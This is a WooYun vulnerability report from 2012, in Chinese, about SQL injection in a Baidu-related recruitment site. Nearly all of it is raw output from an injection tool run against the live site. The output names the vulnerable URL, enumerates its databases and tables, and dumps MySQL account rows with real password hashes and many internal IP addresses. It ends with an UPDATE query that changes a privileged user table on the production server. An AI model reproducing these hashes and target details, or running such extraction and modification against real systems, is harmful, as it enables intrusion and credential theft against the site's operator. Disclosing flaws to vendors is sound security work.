当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07731

漏洞标题:百度某站存在SQL注射漏洞

相关厂商:百度

漏洞作者: zeracker

提交时间:2012-05-31 11:21

修复时间:2012-07-15 11:22

公开时间:2012-07-15 11:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-31: 细节已通知厂商并且等待厂商处理中
2012-05-31: 厂商已经确认,细节仅向厂商公开
2012-06-10: 细节向核心白帽子及相关领域专家公开
2012-06-20: 细节向普通白帽子公开
2012-06-30: 细节向实习白帽子公开
2012-07-15: 细节向公众公开

简要描述:

百度某站存在安全隐患,可渗透致内网拿下33台服务器。
为了保护这个站,肯定是不能说的。
哎,36台服务器的,除去本机的,就是33台内网服务器的。
口令就不说了。
权限的话就不说了,跑表都跑死人。
方向木有泄露出的。
伤不起啊,伤不起。
由于某个注入引发的血案啊,血案啊。
想知道是为什么呢?
请等待公开吧,亲。
俺们希望这个能加个精,20分我是要定了。
喜欢就多多顶贴吧,多多支持。

详细说明:

血案凶手:http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1



Analyzing http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1
Host IP: 58.68.231.87
Web Server: Apache
Powered-by: PHP/5.3.10
Keyword Found: Application
Injection type is Integer
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 2
Valid String Column is 2
DB Server: MySQL
Current DB: sr_spider
Count(table_name) of information_schema.tables where table_schema=0x73725F737069646572 is 1854
Tables found: bi_test,bi_test_sr_entity,company,company_detail,e_p_config,e_perm,e_project,e_r_p_map,e_role,e_u_company,e_u_p_map,e_u_r_map,import_data_log,job,job_profession_info,model_sample,rc_tags,rc_tags_relation,search_ratings,sr_address,sr_base,sr_base_bak,sr_base_dict,sr_base_property,sr_company_search,sr_company_spider,sr_data_trans_log,sr_data_trans_log_20120419,sr_def_base_mapping,sr_entity,sr_entity_md5,sr_entity_resume,sr_fetch_website,sr_field_data_1,sr_field_data_10,sr_field_data_100,sr_field_data_1000,sr_field_data_101,sr_field_data_102,sr_field_data_103,sr_field_data_104,sr_field_data_105,sr_field_data_106,sr_field_data_107,sr_field_data_108,sr_field_data_109,sr_field_data_11,sr_field_data_110,sr_field_data_111,sr_field_data_112,sr_field_data_113,sr_field_data_114,sr_field_data_115,sr_field_data_116,sr_field_data_117,sr_field_data_118,sr_field_data_119,sr_field_data_12,sr_field_data_120,sr_field_data_121,sr_field_data_122,sr_field_data_123,sr_field_data_124,sr_field_data_125,sr_field_data_126,sr_field_data
Can not get all tables by group_concat!
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x62695F74657374 is 6
Column found: id
Column found: url
Column found: visit_time
Column found: ip
Canceling...
Column found: ts
Job Canceled!
Data Base Found: information_schema
Data Base Found: joblog
Data Base Found: mysql
Data Base Found: sr_campus
Data Base Found: sr_commons
Data Base Found: sr_company
Data Base Found: sr_resume
Data Base Found: sr_spider
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x655F705F636F6E666967 is 16
Column found: ID
Column found: Project_ID
Column found: Rerole
Column found: Relogo
Column found: Reoneurl
Column found: Reurl
Column found: Reitem
Column found: Loginlogo
Canceling...
Column found: Loginurl
Job Canceled!
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x696D706F72745F646174615F6C6F67 is 3
Column found: id
Column found: desc
Column found: type
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x6A6F62 is 45
Column found: id
Column found: company_id
Column found: company_admin_id
Column found: job_title
Column found: job_code
Column found: email
Column found: send_flag
Column found: address
Column found: number
Column found: type
Column found: salary
Column found: age
Column found: education
Column found: language1
Column found: language1_value
Column found: language2
Column found: language2_value
Column found: major1
Column found: major2
Column found: work_type
Column found: work_year
Column found: description_cn
Column found: description_en
Column found: auto_reply_flag
Column found: auto_reply_content
Column found: intime
Column found: endtime
Column found: freshtime
Column found: status
Column found: import_flag
Column found: import_url
Column found: pass_flag
Column found: department_id
Column found: salary_show_discuss
Column found: order_seq
Column found: apply_num
Column found: email_model_id
Column found: modify_time
Column found: workplace
Column found: profession_type
Column found: major_txt
Column found: resource
Column found: create_time
Column found: pause_time
Column found: ts
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x6A6F625F70726F66657373696F6E5F696E666F is 8
Column found: level1
Column found: level1_name
Column found: level2
Column found: level2_name
Column found: profession_type_id
Column found: profession_type
Column found: job_title
Column found: id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313136 is 11
Column found: id
Column found: entity_id
Column found: field_id
Column found: field_original_value
Column found: field_value
Column found: field_standard_value
Column found: Schema_id
Column found: Inspection
Column found: STATUS
Column found: User_id
Column found: system_id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313137 is 11
Column found: id
Column found: entity_id
Column found: field_id
Column found: field_original_value
Column found: field_value
Column found: field_standard_value
Column found: Schema_id
Column found: Inspection
Column found: STATUS
Column found: User_id
Column found: system_id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313138 is 11
Column found: id
Column found: entity_id
Column found: field_id
Column found: field_original_value
Column found: field_value
Column found: field_standard_value
Column found: Schema_id
Column found: Inspection
Column found: STATUS
Column found: User_id
Column found: system_id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313139 is 11
Column found: id
Canceling...
Column found: entity_id
Job Canceled!
Count(table_name) of information_schema.tables where table_schema=0x6D7973716C is 23
Table found: columns_priv
Table found: db
Table found: event
Table found: func
Table found: general_log
Table found: help_category
Table found: help_keyword
Table found: help_relation
Table found: help_topic
Table found: host
Table found: ndb_binlog_index
Table found: plugin
Table found: proc
Table found: procs_priv
Table found: servers
Table found: slow_log
Table found: tables_priv
Table found: time_zone
Table found: time_zone_leap_second
Table found: time_zone_name
Table found: time_zone_transition
Table found: time_zone_transition_type
Table found: user
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x636F6C756D6E735F70726976 is 7
Column found: Host
Column found: Db
Column found: User
Column found: Table_name
Column found: Column_name
Column found: Timestamp
Column found: Column_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6462 is 22
Column found: Host
Column found: Db
Column found: User
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Column found: Create_priv
Column found: Drop_priv
Column found: Grant_priv
Column found: References_priv
Column found: Index_priv
Column found: Alter_priv
Column found: Create_tmp_table_priv
Column found: Lock_tables_priv
Column found: Create_view_priv
Column found: Show_view_priv
Column found: Create_routine_priv
Column found: Alter_routine_priv
Column found: Execute_priv
Column found: Event_priv
Column found: Trigger_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6576656E74 is 22
Column found: db
Column found: name
Column found: body
Column found: definer
Column found: execute_at
Column found: interval_value
Column found: interval_field
Column found: created
Column found: modified
Column found: last_executed
Column found: starts
Column found: ends
Column found: status
Column found: on_completion
Column found: sql_mode
Column found: comment
Column found: originator
Column found: time_zone
Column found: character_set_client
Column found: collation_connection
Column found: db_collation
Column found: body_utf8
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x66756E63 is 4
Column found: name
Column found: ret
Column found: dl
Column found: type
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x67656E6572616C5F6C6F67 is 6
Column found: event_time
Column found: user_host
Column found: thread_id
Column found: server_id
Column found: command_type
Column found: argument
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F63617465676F7279 is 4
Column found: help_category_id
Column found: name
Column found: parent_category_id
Column found: url
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F6B6579776F7264 is 2
Column found: help_keyword_id
Column found: name
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F72656C6174696F6E is 2
Column found: help_topic_id
Column found: help_keyword_id
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F746F706963 is 6
Column found: help_topic_id
Column found: name
Column found: help_category_id
Column found: description
Column found: example
Column found: url
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x686F7374 is 20
Column found: Host
Column found: Db
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Column found: Create_priv
Column found: Drop_priv
Column found: Grant_priv
Column found: References_priv
Column found: Index_priv
Column found: Alter_priv
Column found: Create_tmp_table_priv
Column found: Lock_tables_priv
Column found: Create_view_priv
Column found: Show_view_priv
Column found: Create_routine_priv
Column found: Alter_routine_priv
Column found: Execute_priv
Column found: Trigger_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6E64625F62696E6C6F675F696E646578 is 7
Column found: Position
Column found: File
Column found: epoch
Column found: inserts
Column found: updates
Column found: deletes
Column found: schemaops
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x706C7567696E is 2
Column found: name
Column found: dl
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x70726F63 is 20
Column found: db
Column found: name
Column found: type
Column found: specific_name
Column found: language
Column found: sql_data_access
Column found: is_deterministic
Column found: security_type
Column found: param_list
Column found: returns
Column found: body
Column found: definer
Column found: created
Column found: modified
Column found: sql_mode
Column found: comment
Column found: character_set_client
Column found: collation_connection
Column found: db_collation
Column found: body_utf8
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x70726F63735F70726976 is 8
Column found: Host
Column found: Db
Column found: User
Column found: Routine_name
Column found: Routine_type
Column found: Grantor
Column found: Proc_priv
Column found: Timestamp
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x73657276657273 is 9
Column found: Server_name
Column found: Host
Column found: Db
Column found: Username
Column found: Password
Column found: Port
Column found: Socket
Column found: Wrapper
Column found: Owner
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x736C6F775F6C6F67 is 11
Column found: start_time
Column found: user_host
Column found: query_time
Column found: lock_time
Column found: rows_sent
Column found: rows_examined
Column found: db
Column found: last_insert_id
Column found: insert_id
Column found: server_id
Column found: sql_text
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x7461626C65735F70726976 is 8
Column found: Host
Column found: Db
Column found: User
Column found: Table_name
Column found: Grantor
Column found: Timestamp
Column found: Table_priv
Column found: Column_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E65 is 2
Column found: Time_zone_id
Column found: Use_leap_seconds
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F6C6561705F7365636F6E64 is 2
Column found: Transition_time
Column found: Correction
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F6E616D65 is 2
Column found: Name
Column found: Time_zone_id
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F7472616E736974696F6E is 3
Column found: Time_zone_id
Column found: Transition_time
Column found: Transition_type_id
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F7472616E736974696F6E5F74797065 is 5
Column found: Time_zone_id
Column found: Transition_type_id
Column found: Offset
Column found: Is_DST
Column found: Abbreviation
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x75736572 is 39
Column found: Host
Column found: User
Column found: Password
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Column found: Create_priv
Column found: Drop_priv
Column found: Reload_priv
Column found: Shutdown_priv
Column found: Process_priv
Column found: File_priv
Column found: Grant_priv
Column found: References_priv
Column found: Index_priv
Column found: Alter_priv
Column found: Show_db_priv
Column found: Super_priv
Canceling...
Column found: Create_tmp_table_priv
Job Canceled!
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x75736572 is 39
Column found: Host
Column found: User
Column found: Password
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Canceling...
Column found: Create_priv
Job Canceled!
Count(*) of mysql.user is 36
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=bi_select
Data Found: Host=10.30.20.30
Data Found: Password=*1E8BCA2F8283E302C66EEE85CA4544162AD58EC0
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.54
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.72
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.73
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.84
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.93
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.94
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.56
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.57
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=cactiuser
Data Found: Host=10.20.10.26
Data Found: Password=*02C40237B6A2F896C7CB8F5725BEB9C721987587
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.222
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.106
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.107
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.91
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.51
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.52
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.224
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.53
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.27
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Turning off 'bypass illegal union' and retrying!
Data Found: User=
Data Found: Host=db1.search.cn2
Turning on 'bypass illegal union' and retrying!
Data Found: Password=
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.22
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.32
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.40
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.41
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.42
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.43
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.47
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.59
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=khdtestselect
Data Found: Host=10.20.20.20
Data Found: Password=*D6A60A2C4BD4D834EC8C3D83F8A72AE8BD207CE8
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.45
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.44
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.49
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.48
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=Y
Data Found: Update_priv=Y
Data Found: Select_priv=Y
Data Found: User=root
Data Found: Host=127.0.0.1
Data Found: Password=*60EED9B438C83464F8298E48B216C453D1EAEDC1
Data Found: Delete_priv=Y
Data Found: Update_priv=Y
Data Found: Select_priv=Y
Data Found: User=root
Data Found: Host=db1.search.cn2
Turning off 'bypass illegal union' and retrying!
Data Found: Password=
Data Found: Delete_priv=Y
Data Found: Update_priv=Y
Data Found: Select_priv=Y
Data Found: User=root
Data Found: Host=localhost
Data Found: Password=*60EED9B438C83464F8298E48B216C453D1EAEDC1
Query: UPDATE mysql.user SET Host='' where Delete_priv='N' and Update_priv='N' and Select_priv='Y' and User='sespider' and Host='10.30.10.49' and Password='*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89'


以上昨晚我数的是33台内网服务器,就这样暴漏了。哎,而且服务器的口令大部分都是同一个,悲剧哥啊,

漏洞证明:


Count(*) of information_schema.USER_PRIVILEGES is 88
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.43'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=USAGE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='bi_select'@'10.30.20.30'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.56'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='cactiuser'@'10.20.10.26'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.51'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.44'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.47'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='cactiuser'@'10.20.10.26'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.42'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.52'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.57'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.73'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.91'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.49'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='cactiuser'@'10.20.10.26'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.41'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.54'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.59'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.93'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=USAGE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.22'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.48'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='cactiuser'@'10.20.10.26'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=USAGE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.40'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.224'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.42'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.84'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.106'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.47'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.41'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.54'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.52'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.45'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.20.10.54'
Data Found: IS_GRANTABLE=NO
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='sespider'@'10.30.10.222'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SELECT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=EVENT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SHUTDOWN
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=RELOAD
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=REPLICATION SLAVE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SELECT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=FILE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=RELOAD
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=REPLICATION SLAVE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
